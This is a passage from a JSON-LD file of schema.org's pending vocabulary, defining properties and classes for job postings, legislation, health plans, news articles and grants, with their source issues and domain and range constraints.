whether a position is available for an immediate start.", "rdfs:label": "jobImmediateStart" }, { "@id": "http://schema.org/gettingTestedInfo", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2490" }, "http://schema.org/category": "issue-2490", "http://schema.org/domainIncludes": { "@id": "http://schema.org/SpecialAnnouncement" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/WebContent" }, { "@id": "http://schema.org/URL" } ], "rdfs:comment": "Information about getting tested (for a <a class=\"localLink\" href=\"http://schema.org/MedicalCondition\">MedicalCondition</a>), e.g. in the context of a pandemic.", "rdfs:label": "gettingTestedInfo" }, { "@id": "http://schema.org/earlyPrepaymentPenalty", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" }, { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/RepaymentSpecification" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/MonetaryAmount" }, "rdfs:comment": "The amount to be paid as a penalty in the event of early payment of the loan.", "rdfs:label": "earlyPrepaymentPenalty" }, { "@id": "http://schema.org/DefinitiveLegalValue", "@type": "http://schema.org/LegalValueLevel", "http://purl.org/dc/terms/source": [ { "@id": "http://publications.europa.eu/mdr/eli/index.html" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" } ], "http://schema.org/category": "issue-1156", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://www.w3.org/2004/02/skos/core#exactMatch": { "@id": "http://data.europa.eu/eli/ontology#LegalValue-definitive" }, "rdfs:comment": "Indicates a document for which the text is conclusively what the law says and is legally binding. (e.g. The digitally signed version of an Official Journal.)\n Something \"Definitive\" is considered to be also <a class=\"localLink\" href=\"http://schema.org/AuthoritativeLegalValue\">AuthoritativeLegalValue</a>.", "rdfs:label": "DefinitiveLegalValue" }, { "@id": "http://schema.org/legislationResponsible", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "http://publications.europa.eu/mdr/eli/index.html" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" } ], "http://schema.org/category": "issue-1156", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Legislation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Organization" }, { "@id": "http://schema.org/Person" } ], "http://www.w3.org/2002/07/owl#equivalentProperty": { "@id": "http://data.europa.eu/eli/ontology#responsibility_of" }, "http://www.w3.org/2004/02/skos/core#exactMatch": { "@id": "http://data.europa.eu/eli/ontology#responsibility_of" }, "rdfs:comment": "An individual or organization that has some kind of responsibility for the legislation. Typically the ministry who is/was in charge of elaborating the legislation, or the adressee for potential questions about the legislation once it is published.", "rdfs:label": "legislationResponsible" }, { "@id": "http://schema.org/legislationChanges", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "http://publications.europa.eu/mdr/eli/index.html" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" } ], "http://schema.org/category": "issue-1156", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Legislation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Legislation" }, "http://www.w3.org/2002/07/owl#equivalentProperty": { "@id": "http://data.europa.eu/eli/ontology#changes" }, "http://www.w3.org/2004/02/skos/core#exactMatch": { "@id": "http://data.europa.eu/eli/ontology#changes" }, "rdfs:comment": "Another legislation that this legislation changes. This encompasses the notions of amendment, replacement, correction, repeal, or other types of change. This may be a direct change (textual or non-textual amendment) or a consequential or indirect change. The property is to be used to express the existence of a change relationship between two acts rather than the existence of a consolidated version of the text that shows the result of the change. For consolidation relationships, use the <a href=\"/legislationConsolidates\">legislationConsolidates</a> property.", "rdfs:label": "legislationChanges" }, { "@id": "http://schema.org/numberOfCredits", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2419" }, "http://schema.org/category": "issue-2419", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/EducationalOccupationalProgram" }, { "@id": "http://schema.org/Course" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/StructuredValue" }, { "@id": "http://schema.org/Integer" } ], "rdfs:comment": "The number of credits or units awarded by a Course or required to complete an EducationalOccupationalProgram.", "rdfs:label": "numberOfCredits" }, { "@id": "http://schema.org/legislationIdentifier", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" }, { "@id": "http://publications.europa.eu/mdr/eli/index.html" } ], "http://schema.org/category": "issue-1156", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Legislation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/Text" } ], "http://www.w3.org/2004/02/skos/core#closeMatch": { "@id": "http://data.europa.eu/eli/ontology#id_local" }, "rdfs:comment": "An identifier for the legislation. This can be either a string-based identifier, like the CELEX at EU level or the NOR in France, or a web-based, URL/URI identifier, like an ELI (European Legislation Identifier) or an URN-Lex.", "rdfs:label": "legislationIdentifier", "rdfs:subPropertyOf": { "@id": "http://schema.org/identifier" } }, { "@id": "http://schema.org/legislationJurisdiction", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "http://publications.europa.eu/mdr/eli/index.html" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" } ], "http://schema.org/category": "issue-1156", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Legislation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Text" }, { "@id": "http://schema.org/AdministrativeArea" } ], "http://www.w3.org/2002/07/owl#equivalentProperty": { "@id": "http://data.europa.eu/eli/ontology#jurisdiction" }, "http://www.w3.org/2004/02/skos/core#exactMatch": { "@id": "http://data.europa.eu/eli/ontology#jurisdiction" }, "rdfs:comment": "The jurisdiction from which the legislation originates.", "rdfs:label": "legislationJurisdiction", "rdfs:subPropertyOf": { "@id": "http://schema.org/spatialCoverage" } }, { "@id": "http://schema.org/cashBack", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/PaymentCard" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Number" }, { "@id": "http://schema.org/Boolean" } ], "rdfs:comment": "A cardholder benefit that pays the cardholder a small percentage of their net expenditures.", "rdfs:label": "cashBack" }, { "@id": "http://schema.org/AskPublicNewsArticle", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1525" }, { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" } ], "http://schema.org/category": "issue-1525", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A <a class=\"localLink\" href=\"http://schema.org/NewsArticle\">NewsArticle</a> expressing an open call by a <a class=\"localLink\" href=\"http://schema.org/NewsMediaOrganization\">NewsMediaOrganization</a> asking the public for input, insights, clarifications, anecdotes, documentation, etc., on an issue, for reporting purposes.", "rdfs:label": "AskPublicNewsArticle", "rdfs:subClassOf": { "@id": "http://schema.org/NewsArticle" } }, { "@id": "http://schema.org/ReviewNewsArticle", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1525" }, { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" } ], "http://schema.org/category": "issue-1525", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A <a class=\"localLink\" href=\"http://schema.org/NewsArticle\">NewsArticle</a> and <a class=\"localLink\" href=\"http://schema.org/CriticReview\">CriticReview</a> providing a professional critic's assessment of a service, product, performance, or artistic or literary work.", "rdfs:label": "ReviewNewsArticle", "rdfs:subClassOf": [ { "@id": "http://schema.org/CriticReview" }, { "@id": "http://schema.org/NewsArticle" } ] }, { "@id": "http://schema.org/holdingArchive", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1758" }, "http://schema.org/category": { "@language": "en", "@value": "issue-1758" }, "http://schema.org/domainIncludes": { "@id": "http://schema.org/ArchiveComponent" }, "http://schema.org/inverseOf": { "@id": "http://schema.org/archiveHeld" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/ArchiveOrganization" }, "rdfs:comment": "<a class=\"localLink\" href=\"http://schema.org/ArchiveOrganization\">ArchiveOrganization</a> that holds, keeps or maintains the <a class=\"localLink\" href=\"http://schema.org/ArchiveComponent\">ArchiveComponent</a>.", "rdfs:label": { "@language": "en", "@value": "holdingArchive" } }, { "@id": "http://schema.org/ratingExplanation", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2300" }, "http://schema.org/category": "issue-2300", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Rating" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "A short explanation (e.g. one to two sentences) providing background context and other information that led to the conclusion expressed in the rating. This is particularly applicable to ratings associated with \"fact check\" markup using <a class=\"localLink\" href=\"http://schema.org/ClaimReview\">ClaimReview</a>.", "rdfs:label": "ratingExplanation" }, { "@id": "http://schema.org/broadcastSubChannel", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2111" }, "http://schema.org/category": "issue-2111", "http://schema.org/domainIncludes": { "@id": "http://schema.org/BroadcastFrequencySpecification" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "The subchannel used for the broadcast.", "rdfs:label": "broadcastSubChannel" }, { "@id": "http://schema.org/subtitleLanguage", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2110" }, "http://schema.org/category": "issue-2110", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/ScreeningEvent" }, { "@id": "http://schema.org/BroadcastEvent" }, { "@id": "http://schema.org/Movie" }, { "@id": "http://schema.org/TVEpisode" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Text" }, { "@id": "http://schema.org/Language" } ], "rdfs:comment": "Languages in which subtitles/captions are available, in <a href=\"http://tools.ietf.org/html/bcp47\">IETF BCP 47 standard format</a>.", "rdfs:label": "subtitleLanguage" }, { "@id": "http://schema.org/HowOrWhereHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Information about how or where to find a topic. Also may contain location data that can be used for where to look for help if the topic is observed.", "rdfs:label": "HowOrWhereHealthAspect" }, { "@id": "http://schema.org/correctionsPolicy", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1525" }, { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" } ], "http://schema.org/category": "issue-1525", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/NewsMediaOrganization" }, { "@id": "http://schema.org/Organization" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/CreativeWork" } ], "rdfs:comment": "For an <a class=\"localLink\" href=\"http://schema.org/Organization\">Organization</a> (e.g. <a class=\"localLink\" href=\"http://schema.org/NewsMediaOrganization\">NewsMediaOrganization</a>), a statement describing (in news media, the newsroom’s) disclosure and correction policy for errors.", "rdfs:label": "correctionsPolicy", "rdfs:subPropertyOf": { "@id": "http://schema.org/publishingPrinciples" } }, { "@id": "http://schema.org/codeValue", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/894" }, "http://schema.org/category": "issue-894", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/MedicalCode" }, { "@id": "http://schema.org/CategoryCode" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "A short textual code that uniquely identifies the value.", "rdfs:label": "codeValue", "rdfs:subPropertyOf": { "@id": "http://schema.org/termCode" } }, { "@id": "http://schema.org/diseaseSpreadStatistics", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2490" }, "http://schema.org/category": "issue-2490", "http://schema.org/domainIncludes": { "@id": "http://schema.org/SpecialAnnouncement" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/WebContent" }, { "@id": "http://schema.org/Dataset" }, { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/Observation" } ], "rdfs:comment": "Statistical information about the spread of a disease, either as <a class=\"localLink\" href=\"http://schema.org/WebContent\">WebContent</a>, or\n described directly as a <a class=\"localLink\" href=\"http://schema.org/Dataset\">Dataset</a>, or the specific <a class=\"localLink\" href=\"http://schema.org/Observation\">Observation</a>s in the dataset. When a <a class=\"localLink\" href=\"http://schema.org/WebContent\">WebContent</a> URL is\n provided, the page indicated might also contain more such markup.", "rdfs:label": "diseaseSpreadStatistics" }, { "@id": "http://schema.org/LibrarySystem", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1495" }, "http://schema.org/category": "issue-1495", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A <a class=\"localLink\" href=\"http://schema.org/LibrarySystem\">LibrarySystem</a> is a collaborative system amongst several libraries.", "rdfs:label": "LibrarySystem", "rdfs:subClassOf": { "@id": "http://schema.org/Organization" } }, { "@id": "http://schema.org/Manuscript", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1448" }, "http://schema.org/category": "issue-1448", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A book, document, or piece of music written by hand rather than typed or printed.", "rdfs:label": "Manuscript", "rdfs:subClassOf": { "@id": "http://schema.org/CreativeWork" } }, { "@id": "http://schema.org/hasMerchantReturnPolicy", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-2288", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/Product" }, { "@id": "http://schema.org/Organization" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/MerchantReturnPolicy" }, "rdfs:comment": "Indicates a MerchantReturnPolicy that may be applicable.", "rdfs:label": "hasMerchantReturnPolicy" }, { "@id": "http://schema.org/healthPlanCostSharing", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/HealthPlanFormulary" }, { "@id": "http://schema.org/HealthPlanNetwork" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Boolean" }, "rdfs:comment": "Whether The costs to the patient for services under this network or formulary.", "rdfs:label": "healthPlanCostSharing" }, { "@id": "http://schema.org/documentation", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1423" }, "http://schema.org/category": "issue-1423", "http://schema.org/domainIncludes": { "@id": "http://schema.org/WebAPI" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/CreativeWork" } ], "rdfs:comment": "Further documentation describing the Web API in more detail.", "rdfs:label": "documentation" }, { "@id": "http://schema.org/AuthenticContent", "@type": "http://schema.org/MediaManipulationRatingEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2450" }, "http://schema.org/category": "issue-2450", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "AuthenticMediaObject: An unaltered image that is presented in an accurate way.", "rdfs:label": "AuthenticContent" }, { "@id": "http://schema.org/WebAPI", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1423" }, "http://schema.org/category": "issue-1423", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "An application programming interface accessible over Web/Internet technologies.", "rdfs:label": "WebAPI", "rdfs:subClassOf": { "@id": "http://schema.org/Service" } }, { "@id": "http://schema.org/healthPlanDrugTier", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/HealthPlanFormulary" }, { "@id": "http://schema.org/HealthInsurancePlan" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "The tier(s) of drugs offered by this formulary or insurance plan.", "rdfs:label": "healthPlanDrugTier" }, { "@id": "http://schema.org/employerOverview", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2396" }, "http://schema.org/category": "issue-2396", "http://schema.org/domainIncludes": { "@id": "http://schema.org/JobPosting" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "A description of the employer, career opportunities and work environment for this position.", "rdfs:label": "employerOverview" }, { "@id": "http://schema.org/OfferForLease", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2348" }, "http://schema.org/category": "issue-2348", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "An <a class=\"localLink\" href=\"http://schema.org/OfferForLease\">OfferForLease</a> in Schema.org represents an <a class=\"localLink\" href=\"http://schema.org/Offer\">Offer</a> to lease out something, i.e. an <a class=\"localLink\" href=\"http://schema.org/Offer\">Offer</a> whose\n <a class=\"localLink\" href=\"http://schema.org/businessFunction\">businessFunction</a> is <a href=\"http://purl.org/goodrelations/v1#LeaseOut.\">lease out</a>. See <a href=\"https://en.wikipedia.org/wiki/GoodRelations\">Good Relations</a> for\n background on the underlying concepts.", "rdfs:label": "OfferForLease", "rdfs:subClassOf": { "@id": "http://schema.org/Offer" } }, { "@id": "http://schema.org/isAcceptingNewPatients", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/domainIncludes": { "@id": "http://schema.org/MedicalOrganization" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Boolean" }, "rdfs:comment": "Whether the provider is accepting new patients.", "rdfs:label": "isAcceptingNewPatients" }, { "@id": "http://schema.org/Grant", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FundInfoCollab" }, "http://schema.org/category": "issue-383", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A grant, typically financial or otherwise quantifiable, of resources. Typically a <a class=\"localLink\" href=\"http://schema.org/funder\">funder</a> sponsors some <a class=\"localLink\" href=\"http://schema.org/MonetaryAmount\">MonetaryAmount</a> to an <a class=\"localLink\" href=\"http://schema.org/Organization\">Organization</a> or <a class=\"localLink\" href=\"http://schema.org/Person\">Person</a>,\n sometimes not necessarily via a dedicated or long-lived <a class=\"localLink\" href=\"http://schema.org/Project\">Project</a>, resulting in one or more outputs, or <a class=\"localLink\" href=\"http://schema.org/fundedItem\">fundedItem</a>s. For financial sponsorship, indicate the <a class=\"localLink\" href=\"http://schema.org/funder\">funder</a> of a <a class=\"localLink\" href=\"http://schema.org/MonetaryGrant\">MonetaryGrant</a>. For non-financial support, indicate <a class=\"localLink\" href=\"http://schema.org/sponsor\">sponsor</a> of <a class=\"localLink\" href=\"http://schema.org/Grant\">Grant</a>s of resources (e.g. office space).<br/><br/>\n\nGrants support activities directed towards some agreed collective goals, often but not always organized as <a class=\"localLink\" href=\"http://schema.org/Project\">Project</a>s. Long-lived projects are sometimes sponsored by a variety of grants over time, but it is also common for a project to be associated with a single grant.<br/><br/>\n\nThe amount of a <a class=\"localLink\" href=\"http://schema.org/Grant\">Grant</a> is represented using <a class=\"localLink\" href=\"http://schema.org/amount\">amount</a> as a <a class=\"localLink\" href=\"http://schema.org/MonetaryAmount\">MonetaryAmount</a>.", "rdfs:label": "Grant", "rdfs:subClassOf": { "@id": "http://schema.org/Intangible" } }, { "@id": "http://schema.org/PatientExperienceHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Content about the real life experience of patients or people that have lived a similar experience about the topic. May be forums, topics, Q-and-A and related material.", "rdfs:label": "PatientExperienceHealthAspect" }, { "@id": "http://schema.org/correction", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1950" }, { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" } ], "http://schema.org/category": [ "issue-1688", "issue-1950" ], "http://schema.org/domainIncludes": { "@id": "http://schema.org/CreativeWork" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/CorrectionComment" }, { "@id": "http://schema.org/Text" } ], "rdfs:comment": "Indicates a correction to a <a class=\"localLink\" href=\"http://schema.org/CreativeWork\">CreativeWork</a>, either via a <a class=\"localLink\" href=\"http://schema.org/CorrectionComment\">CorrectionComment</a>, textually or in another document.", "rdfs:label": "correction" }, { "@id": "http://schema.org/DefinedTerm", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/894" }, "http://schema.org/category": "issue-894", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A word, name, acronym, phrase, etc. with a formal definition. Often used in the context of category or subject classification, glossaries or dictionaries, product or creative work types, etc. Use the name property for the term being defined, use termCode if the term has an alpha-numeric code allocated, use description to provide the definition of the term.", "rdfs:label": "DefinedTerm", "rdfs:subClassOf": { "@id": "http://schema.org/Intangible" } }, { "@id": "http://schema.org/knowsAbout", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1688" }, { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" } ], "http://schema.org/category": "issue-1688", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/Organization" }, { "@id": "http://schema.org/Person" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/Thing" }, { "@id": "http://schema.org/Text" } ], "rdfs:comment": "Of a <a class=\"localLink\" href=\"http://schema.org/Person\">Person</a>, and less typically of an <a class=\"localLink\" href=\"http://schema.org/Organization\">Organization</a>, to indicate a topic that is known about - suggesting possible expertise but not implying it. We do not distinguish skill levels here, or relate this to educational content, events, objectives or <a class=\"localLink\" href=\"http://schema.org/JobPosting\">JobPosting</a> descriptions.", "rdfs:label": "knowsAbout" }, { "@id": "http://schema.org/qualifications", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1698" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1779" } ], "http://schema.org/category": [ "issue-1698", "issue-1779" ], "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/Occupation" }, { "@id": "http://schema.org/JobPosting" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Text" }, { "@id": "http://schema.org/EducationalOccupationalCredential" } ], "rdfs:comment": "Specific qualifications required for this role or Occupation.", "rdfs:label": "qualifications" }, { "@id": "http://schema.org/constrainingProperty", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2291" }, "http://schema.org/category": "issue-2291", "http://schema.org/domainIncludes": { "@id": "http://schema.org/StatisticalPopulation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Integer" }, "rdfs:comment": "Indicates a property used as a constraint to define a <a class=\"localLink\" href=\"http://schema.org/StatisticalPopulation\">StatisticalPopulation</a> with respect to the set of entities\n corresponding to an indicated type (via <a class=\"localLink\" href=\"http://schema.org/populationType\">populationType</a>).", "rdfs:label": "constrainingProperty" }, { "@id": "http://schema.org/StagesHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Stages that can be observed from a topic.", "rdfs:label": "StagesHealthAspect" }, { "@id": "http://schema.org/MediaManipulationRatingEnumeration", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2450" }, "http://schema.org/category": "issue-2450", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "(editorial work in progress, this definition is incomplete and unreviewed) MediaManipulationRatingEnumeration classifies a number of ways in which a media item (video, image, audio) can be manipulated, taking into account the context within which they are published or presented.", "rdfs:label": "MediaManipulationRatingEnumeration", "rdfs:subClassOf": { "@id": "http://schema.org/Enumeration" } }, { "@id": "http://schema.org/Project", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FundInfoCollab" }, "http://schema.org/category": "issue-383", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "An enterprise (potentially individual but typically collaborative), planned to achieve a particular aim.\nUse properties from <a class=\"localLink\" href=\"http://schema.org/Organization\">Organization</a>, <a class=\"localLink\" href=\"http://schema.org/subOrganization\">subOrganization</a>/<a class=\"localLink\" href=\"http://schema.org/parentOrganization\">parentOrganization</a> to indicate project sub-structures.", "rdfs:label": "Project", "rdfs:subClassOf": { "@id": "http://schema.org/Organization" } }, { "@id": "http://schema.org/measuredValue", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2291" }, "http://schema.org/category": "issue-2291", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Observation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/DataType" }, "rdfs:comment": "The measuredValue of an <a class=\"localLink\" href=\"http://schema.org/Observation\">Observation</a>.", "rdfs:label": "measuredValue" }, { "@id": "http://schema.org/EmployerReview", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1589" }, "http://schema.org/category": "issue-1576", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "An <a class=\"localLink\" href=\"http://schema.org/EmployerReview\">EmployerReview</a> is a review of an <a class=\"localLink\" href=\"http://schema.org/Organization\">Organization</a> regarding its role as an employer, written by a current or former employee of that organization.", "rdfs:label": "EmployerReview", "rdfs:subClassOf": { "@id": "http://schema.org/Review" } }, { "@id": "http://schema.org/healthPlanNetworkTier", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/domainIncludes": { "@id": "http://schema.org/HealthPlanNetwork" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "The tier(s) for this network.", "rdfs:label": "healthPlanNetworkTier" }, { "@id": "http://schema.org/noBylinesPolicy", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": 